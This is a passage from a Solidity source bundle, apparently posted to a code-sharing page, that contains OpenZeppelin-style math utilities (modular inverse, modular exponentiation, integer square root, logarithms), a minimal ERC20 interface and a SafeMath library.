// ax + ny = gcd(a, n) = n
// 0a + 1n = n
int256 x = 0;
int256 y = 1;
while (remainder != 0) {
uint256 quotient = gcd / remainder;
(gcd, remainder) = (
// The old remainder is the next gcd to try.
remainder,
// Compute the next remainder.
// Can't overflow given that (a % gcd) * (gcd // (a % gcd)) <= gcd
// where gcd is at most n (capped to type(uint256).max)
gcd - remainder * quotient
);
(x, y) = (
// Increment the coefficient of a.
y,
// Decrement the coefficient of n.
// Can overflow, but the result is casted to uint256 so that the
// next value of y is "wrapped around" to a value between 0 and n - 1.
x - y * int256(quotient)
);
}
if (gcd != 1) return 0; // No inverse exists.
return ternary(x < 0, n - uint256(-x), uint256(x)); // Wrap the result if it's negative.
}
}
/**
* @dev Variant of {invMod}. More efficient, but only works if `p` is known to be a prime greater than `2`.
*
* From https://en.wikipedia.org/wiki/Fermat%27s_little_theorem[Fermat's little theorem], we know that if p is
* prime, then `a**(p-1) ≡ 1 mod p`. As a consequence, we have `a * a**(p-2) ≡ 1 mod p`, which means that
* `a**(p-2)` is the modular multiplicative inverse of a in Fp.
*
* NOTE: this function does NOT check that `p` is a prime greater than `2`.
*/
function invModPrime(uint256 a, uint256 p) internal view returns (uint256) {
unchecked {
return Math.modExp(a, p - 2, p);
}
}
/**
* @dev Returns the modular exponentiation of the specified base, exponent and modulus (b ** e % m)
*
* Requirements:
* - modulus can't be zero
* - underlying staticcall to precompile must succeed
*
* IMPORTANT: The result is only valid if the underlying call succeeds. When using this function, make
* sure the chain you're using it on supports the precompiled contract for modular exponentiation
* at address 0x05 as specified in https://eips.ethereum.org/EIPS/eip-198[EIP-198]. Otherwise,
* the underlying function will succeed given the lack of a revert, but the result may be incorrectly
* interpreted as 0.
*/
function modExp(uint256 b, uint256 e, uint256 m) internal view returns (uint256) {
(bool success, uint256 result) = tryModExp(b, e, m);
if (!success) {
Panic.panic(Panic.DIVISION_BY_ZERO);
}
return result;
}
/**
* @dev Returns the modular exponentiation of the specified base, exponent and modulus (b ** e % m).
* It includes a success flag indicating if the operation succeeded. Operation will be marked as failed if trying
* to operate modulo 0 or if the underlying precompile reverted.
*
* IMPORTANT: The result is only valid if the success flag is true. When using this function, make sure the chain
* you're using it on supports the precompiled contract for modular exponentiation at address 0x05 as specified in
* https://eips.ethereum.org/EIPS/eip-198[EIP-198]. Otherwise, the underlying function will succeed given the lack
* of a revert, but the result may be incorrectly interpreted as 0.
*/
function tryModExp(uint256 b, uint256 e, uint256 m) internal view returns (bool success, uint256 result) {
if (m == 0) return (false, 0);
assembly ("memory-safe") {
let ptr := mload(0x40)
// | Offset | Content | Content (Hex) |
// |-----------|------------|--------------------------------------------------------------------|
// | 0x00:0x1f | size of b | 0x0000000000000000000000000000000000000000000000000000000000000020 |
// | 0x20:0x3f | size of e | 0x0000000000000000000000000000000000000000000000000000000000000020 |
// | 0x40:0x5f | size of m | 0x0000000000000000000000000000000000000000000000000000000000000020 |
// | 0x60:0x7f | value of b | 0x<.............................................................b> |
// | 0x80:0x9f | value of e | 0x<.............................................................e> |
// | 0xa0:0xbf | value of m | 0x<.............................................................m> |
mstore(ptr, 0x20)
mstore(add(ptr, 0x20), 0x20)
mstore(add(ptr, 0x40), 0x20)
mstore(add(ptr, 0x60), b)
mstore(add(ptr, 0x80), e)
mstore(add(ptr, 0xa0), m)
// Given the result < m, it's guaranteed to fit in 32 bytes,
// so we can use the memory scratch space located at offset 0.
success := staticcall(gas(), 0x05, ptr, 0xc0, 0x00, 0x20)
result := mload(0x00)
}
}
/**
* @dev Variant of {modExp} that supports inputs of arbitrary length.
*/
function modExp(bytes memory b, bytes memory e, bytes memory m) internal view returns (bytes memory) {
(bool success, bytes memory result) = tryModExp(b, e, m);
if (!success) {
Panic.panic(Panic.DIVISION_BY_ZERO);
}
return result;
}
/**
* @dev Variant of {tryModExp} that supports inputs of arbitrary length.
*/
function tryModExp(
bytes memory b,
bytes memory e,
bytes memory m
) internal view returns (bool success, bytes memory result) {
if (_zeroBytes(m)) return (false, new bytes(0));
uint256 mLen = m.length;
// Encode call args in result and move the free memory pointer
result = abi.encodePacked(b.length, e.length, mLen, b, e, m);
assembly ("memory-safe") {
let dataPtr := add(result, 0x20)
// Write result on top of args to avoid allocating extra memory.
success := staticcall(gas(), 0x05, dataPtr, mload(result), dataPtr, mLen)
// Overwrite the length.
// result.length > returndatasize() is guaranteed because returndatasize() == m.length
mstore(result, mLen)
// Set the memory pointer after the returned data.
mstore(0x40, add(dataPtr, mLen))
}
}
/**
* @dev Returns whether the provided byte array is zero.
*/
function _zeroBytes(bytes memory byteArray) private pure returns (bool) {
for (uint256 i = 0; i < byteArray.length; ++i) {
if (byteArray[i] != 0) {
return false;
}
}
return true;
}
/**
* @dev Returns the square root of a number. If the number is not a perfect square, the value is rounded
* towards zero.
*
* This method is based on Newton's method for computing square roots; the algorithm is restricted to only
* using integer operations.
*/
function sqrt(uint256 a) internal pure returns (uint256) {
unchecked {
// Take care of easy edge cases when a == 0 or a == 1
if (a <= 1) {
return a;
}
// In this function, we use Newton's method to get a root of `f(x) := x² - a`. It involves building a
// sequence x_n that converges toward sqrt(a). For each iteration x_n, we also define the error between
// the current value as `ε_n = | x_n - sqrt(a) |`.
//
// For our first estimation, we consider `e` the smallest power of 2 which is bigger than the square root
// of the target. (i.e. `2**(e-1) ≤ sqrt(a) < 2**e`). We know that `e ≤ 128` because `(2¹²⁸)² = 2²⁵⁶` is
// bigger than any uint256.
//
// By noticing that
// `2**(e-1) ≤ sqrt(a) < 2**e → (2**(e-1))² ≤ a < (2**e)² → 2**(2*e-2) ≤ a < 2**(2*e)`
// we can deduce that `e - 1` is `log2(a) / 2`. We can thus compute `x_n = 2**(e-1)` using a method similar
// to the msb function.
uint256 aa = a;
uint256 xn = 1;
if (aa >= (1 << 128)) {
aa >>= 128;
xn <<= 64;
}
if (aa >= (1 << 64)) {
aa >>= 64;
xn <<= 32;
}
if (aa >= (1 << 32)) {
aa >>= 32;
xn <<= 16;
}
if (aa >= (1 << 16)) {
aa >>= 16;
xn <<= 8;
}
if (aa >= (1 << 8)) {
aa >>= 8;
xn <<= 4;
}
if (aa >= (1 << 4)) {
aa >>= 4;
xn <<= 2;
}
if (aa >= (1 << 2)) {
xn <<= 1;
}
// We now have x_n such that `x_n = 2**(e-1) ≤ sqrt(a) < 2**e = 2 * x_n`. This implies ε_n ≤ 2**(e-1).
//
// We can refine our estimation by noticing that the middle of that interval minimizes the error.
// If we move x_n to equal 2**(e-1) + 2**(e-2), then we reduce the error to ε_n ≤ 2**(e-2).
// This is going to be our x_0 (and ε_0)
xn = (3 * xn) >> 1; // ε_0 := | x_0 - sqrt(a) | ≤ 2**(e-2)
// From here, Newton's method give us:
// x_{n+1} = (x_n + a / x_n) / 2
//
// One should note that:
// x_{n+1}² - a = ((x_n + a / x_n) / 2)² - a
// = ((x_n² + a) / (2 * x_n))² - a
// = (x_n⁴ + 2 * a * x_n² + a²) / (4 * x_n²) - a
// = (x_n⁴ + 2 * a * x_n² + a² - 4 * a * x_n²) / (4 * x_n²)
// = (x_n⁴ - 2 * a * x_n² + a²) / (4 * x_n²)
// = (x_n² - a)² / (2 * x_n)²
// = ((x_n² - a) / (2 * x_n))²
// ≥ 0
// Which proves that for all n ≥ 1, sqrt(a) ≤ x_n
//
// This gives us the proof of quadratic convergence of the sequence:
// ε_{n+1} = | x_{n+1} - sqrt(a) |
// = | (x_n + a / x_n) / 2 - sqrt(a) |
// = | (x_n² + a - 2*x_n*sqrt(a)) / (2 * x_n) |
// = | (x_n - sqrt(a))² / (2 * x_n) |
// = | ε_n² / (2 * x_n) |
// = ε_n² / | (2 * x_n) |
//
// For the first iteration, we have a special case where x_0 is known:
// ε_1 = ε_0² / | (2 * x_0) |
// ≤ (2**(e-2))² / (2 * (2**(e-1) + 2**(e-2)))
// ≤ 2**(2*e-4) / (3 * 2**(e-1))
// ≤ 2**(e-3) / 3
// ≤ 2**(e-3-log2(3))
// ≤ 2**(e-4.5)
//
// For the following iterations, we use the fact that, 2**(e-1) ≤ sqrt(a) ≤ x_n:
// ε_{n+1} = ε_n² / | (2 * x_n) |
// ≤ (2**(e-k))² / (2 * 2**(e-1))
// ≤ 2**(2*e-2*k) / 2**e
// ≤ 2**(e-2*k)
xn = (xn + a / xn) >> 1; // ε_1 := | x_1 - sqrt(a) | ≤ 2**(e-4.5) -- special case, see above
xn = (xn + a / xn) >> 1; // ε_2 := | x_2 - sqrt(a) | ≤ 2**(e-9) -- general case with k = 4.5
xn = (xn + a / xn) >> 1; // ε_3 := | x_3 - sqrt(a) | ≤ 2**(e-18) -- general case with k = 9
xn = (xn + a / xn) >> 1; // ε_4 := | x_4 - sqrt(a) | ≤ 2**(e-36) -- general case with k = 18
xn = (xn + a / xn) >> 1; // ε_5 := | x_5 - sqrt(a) | ≤ 2**(e-72) -- general case with k = 36
xn = (xn + a / xn) >> 1; // ε_6 := | x_6 - sqrt(a) | ≤ 2**(e-144) -- general case with k = 72
// Because e ≤ 128 (as discussed during the first estimation phase), we know have reached a precision
// ε_6 ≤ 2**(e-144) < 1. Given we're operating on integers, then we can ensure that xn is now either
// sqrt(a) or sqrt(a) + 1.
return xn - SafeCast.toUint(xn > a / xn);
}
}
/**
* @dev Calculates sqrt(a), following the selected rounding direction.
*/
function sqrt(uint256 a, Rounding rounding) internal pure returns (uint256) {
unchecked {
uint256 result = sqrt(a);
return result + SafeCast.toUint(unsignedRoundsUp(rounding) && result * result < a);
}
}
/**
* @dev Return the log in base 2 of a positive value rounded towards zero.
* Returns 0 if given 0.
*/
function log2(uint256 x) internal pure returns (uint256 r) {
// If value has upper 128 bits set, log2 result is at least 128
r = SafeCast.toUint(x > 0xffffffffffffffffffffffffffffffff) << 7;
// If upper 64 bits of 128-bit half set, add 64 to result
r |= SafeCast.toUint((x >> r) > 0xffffffffffffffff) << 6;
// If upper 32 bits of 64-bit half set, add 32 to result
r |= SafeCast.toUint((x >> r) > 0xffffffff) << 5;
// If upper 16 bits of 32-bit half set, add 16 to result
r |= SafeCast.toUint((x >> r) > 0xffff) << 4;
// If upper 8 bits of 16-bit half set, add 8 to result
r |= SafeCast.toUint((x >> r) > 0xff) << 3;
// If upper 4 bits of 8-bit half set, add 4 to result
r |= SafeCast.toUint((x >> r) > 0xf) << 2;
// Shifts value right by the current result and use it as an index into this lookup table:
//
// | x (4 bits) | index | table[index] = MSB position |
// |------------|---------|-----------------------------|
// | 0000 | 0 | table[0] = 0 |
// | 0001 | 1 | table[1] = 0 |
// | 0010 | 2 | table[2] = 1 |
// | 0011 | 3 | table[3] = 1 |
// | 0100 | 4 | table[4] = 2 |
// | 0101 | 5 | table[5] = 2 |
// | 0110 | 6 | table[6] = 2 |
// | 0111 | 7 | table[7] = 2 |
// | 1000 | 8 | table[8] = 3 |
// | 1001 | 9 | table[9] = 3 |
// | 1010 | 10 | table[10] = 3 |
// | 1011 | 11 | table[11] = 3 |
// | 1100 | 12 | table[12] = 3 |
// | 1101 | 13 | table[13] = 3 |
// | 1110 | 14 | table[14] = 3 |
// | 1111 | 15 | table[15] = 3 |
//
// The lookup table is represented as a 32-byte value with the MSB positions for 0-15 in the last 16 bytes.
assembly ("memory-safe") {
r := or(r, byte(shr(r, x), 0x0000010102020202030303030303030300000000000000000000000000000000))
}
}
/**
* @dev Return the log in base 2, following the selected rounding direction, of a positive value.
* Returns 0 if given 0.
*/
function log2(uint256 value, Rounding rounding) internal pure returns (uint256) {
unchecked {
uint256 result = log2(value);
return result + SafeCast.toUint(unsignedRoundsUp(rounding) && 1 << result < value);
}
}
/**
* @dev Return the log in base 10 of a positive value rounded towards zero.
* Returns 0 if given 0.
*/
function log10(uint256 value) internal pure returns (uint256) {
uint256 result = 0;
unchecked {
if (value >= 10 ** 64) {
value /= 10 ** 64;
result += 64;
}
if (value >= 10 ** 32) {
value /= 10 ** 32;
result += 32;
}
if (value >= 10 ** 16) {
value /= 10 ** 16;
result += 16;
}
if (value >= 10 ** 8) {
value /= 10 ** 8;
result += 8;
}
if (value >= 10 ** 4) {
value /= 10 ** 4;
result += 4;
}
if (value >= 10 ** 2) {
value /= 10 ** 2;
result += 2;
}
if (value >= 10 ** 1) {
result += 1;
}
}
return result;
}
/**
* @dev Return the log in base 10, following the selected rounding direction, of a positive value.
* Returns 0 if given 0.
*/
function log10(uint256 value, Rounding rounding) internal pure returns (uint256) {
unchecked {
uint256 result = log10(value);
return result + SafeCast.toUint(unsignedRoundsUp(rounding) && 10 ** result < value);
}
}
/**
* @dev Return the log in base 256 of a positive value rounded towards zero.
* Returns 0 if given 0.
*
* Adding one to the result gives the number of pairs of hex symbols needed to represent `value` as a hex string.
*/
function log256(uint256 x) internal pure returns (uint256 r) {
// If value has upper 128 bits set, log2 result is at least 128
r = SafeCast.toUint(x > 0xffffffffffffffffffffffffffffffff) << 7;
// If upper 64 bits of 128-bit half set, add 64 to result
r |= SafeCast.toUint((x >> r) > 0xffffffffffffffff) << 6;
// If upper 32 bits of 64-bit half set, add 32 to result
r |= SafeCast.toUint((x >> r) > 0xffffffff) << 5;
// If upper 16 bits of 32-bit half set, add 16 to result
r |= SafeCast.toUint((x >> r) > 0xffff) << 4;
// Add 1 if upper 8 bits of 16-bit half set, and divide accumulated result by 8
return (r >> 3) | SafeCast.toUint((x >> r) > 0xff);
}
/**
* @dev Return the log in base 256, following the selected rounding direction, of a positive value.
* Returns 0 if given 0.
*/
function log256(uint256 value, Rounding rounding) internal pure returns (uint256) {
unchecked {
uint256 result = log256(value);
return result + SafeCast.toUint(unsignedRoundsUp(rounding) && 1 << (result << 3) < value);
}
}
/**
* @dev Returns whether a provided rounding mode is considered rounding up for unsigned integers.
*/
function unsignedRoundsUp(Rounding rounding) internal pure returns (bool) {
return uint8(rounding) % 2 == 1;
}
}
"
},
"token/IERC20.sol": {
"content": "// File: contracts\open-zeppelin-contracts\ oken\ERC20\IERC20.sol\r
\r
/**\r
* SPDX-License-Identifier: MIT (OpenZeppelin)\r
*/\r
pragma solidity 0.8.25;\r
\r
\r
/**\r
* @dev Interface of the ERC20 standard as defined in the EIP. Does not include\r
* the optional functions; to access them see `ERC20Detailed`.\r
*/\r
interface IERC20 {\r
\r
/**\r
* @dev Emitted when `value` tokens are moved from one account (`from`) to\r
* another (`to`).\r
*\r
* Note that `value` may be zero.\r
*/\r
event Transfer(address indexed from, address indexed to, uint256 value);\r
\r
/**\r
* @dev Emitted when the allowance of a `spender` for an `owner` is set by\r
* a call to `approve`. `value` is the new allowance.\r
*/\r
event Approval(address indexed owner, address indexed spender, uint256 value);\r
}"
},
"token/SafeMath.sol": {
"content": "\r
// File: contracts\open-zeppelin-contracts\math\SafeMath.sol\r
/**\r
* SPDX-License-Identifier: MIT (OpenZeppelin)\r
*/\r
\r
pragma solidity 0.8.25;\r
\r
/**\r
* @dev Wrappers over Solidity's arithmetic operations with added overflow\r
* checks.\r
*\r
* Arithmetic operations in Solidity wrap on overflow. This can easily result\r
* in bugs, because programmers usually assume that an overflow raises an\r
* error, which is the standard behavior in high level programming languages.\r
* `SafeMath` restores this intuition by reverting the transaction when an\r
* operation overflows.\r
*\r
* Using this library instead of the unchecked operations eliminates an entire\r
* class of bugs, so it's recommended to use it always.\r
*/\r
library SafeMath {\r
/**\r
* @dev Returns the addition of two unsigned integers, reverting on\r
* overflow.\r
*\r
* Counterpart to Solidity's `+` operator.\r
*\r
* Requirements:\r
* - Addition cannot overflow.\r
*/\r
function add(uint256 a, uint256 b) internal pure returns (uint256) {\r
uint256 c = a + b;\r
require(c >= a, "SafeMath: addition overflow");\r
\r
return c;\r
}\r
\r
/**\r
* @dev Returns the subtraction of two unsigned integers, reverting on\r
* overflow (when the result is negative).\r
*\r
* Counterpart to Solidity's `-` operator.\r
*\r
* Requirements:\r
* - Subtraction cannot overflow.\r
*/\r
function sub(uint256 a, uint256 b) internal pure returns (uint256) {\r
require(b <= a, "SafeMath: subtraction overflow");\r
uint256 c = a - b;\r
\r
return c;\r
}\r
\r
/**\r
* @dev Returns the multiplication of two unsigned integers, reverting on\r
* overflow.\r
*\r
* Counterpart to Solidity's `*` operator.\r
*\r
* Requirements:\r
* - Multiplication cannot overflow.\r
*/\r
function mul(uint256 a, uint256 b) internal pure returns (uint256) {\r
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the\r
// benefit is lost if 'b' is also tested.\r
// See: https://github.com/OpenZeppelin/openzeppelin-solidity/pull/522\r
if (a == 0) {\r
return 0;\r
}\r
\r
uint256 c = a * b;\r
require(c / a == b, "SafeMath: multiplication overflow");\r
\r
return c;\r
}\r
\r
/**\r
* @dev Returns the integer division of two unsigned integers. Reverts on\r
* division by zero. The result is rounded towards zero.\r
*\r
* Counterpart to Solidity's `/` operator. Note: this function uses a\r
* `revert` opcode (which leaves remaining gas untouched) while Solidity\r
* uses an invalid opcode to revert (consuming all remaining gas).\r
*\r
* Requirements:\r
* - The divisor cannot be zero.\r
*/\r
function div(uint256 a, uint256 b) internal pure returns (uint256) {\r
// Solidity only automatically asserts when dividing by 0\r
require(b > 0, "SafeMath: division by zero");\r
uint256 c = a / b;\r
// assert(a == b * c + a % b); // There is no case in which this doesn't hold\r
\r
return c;\r
}\r
\r
/**\r
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),\r
* Reverts when dividing by zero.\r
*\r
* Counterpart to Solidity's `%` operator. This function uses a `revert`\r
* opcode (which leaves remaining gas untouched) while Solidity uses an\r
* invalid opcode to revert (consuming all remaining gas).\r
*\r
* Requirements:\r
* - The divisor cannot be zero.\r
*/\r
function mod(uint256 a, uint256 b) internal pure returns (uint256) {\r
require(b != 0, "SafeMath: modulo by zero");\r
return a % b;\r
}\r
}"
},
"@openzeppelin/contracts/utils/math/SafeCast.sol": {
"content": "// SPDX-License-Identifier: MIT\Submitted on: 2025-10-10 17:08:16
Comments
Log in to comment.
No comments yet.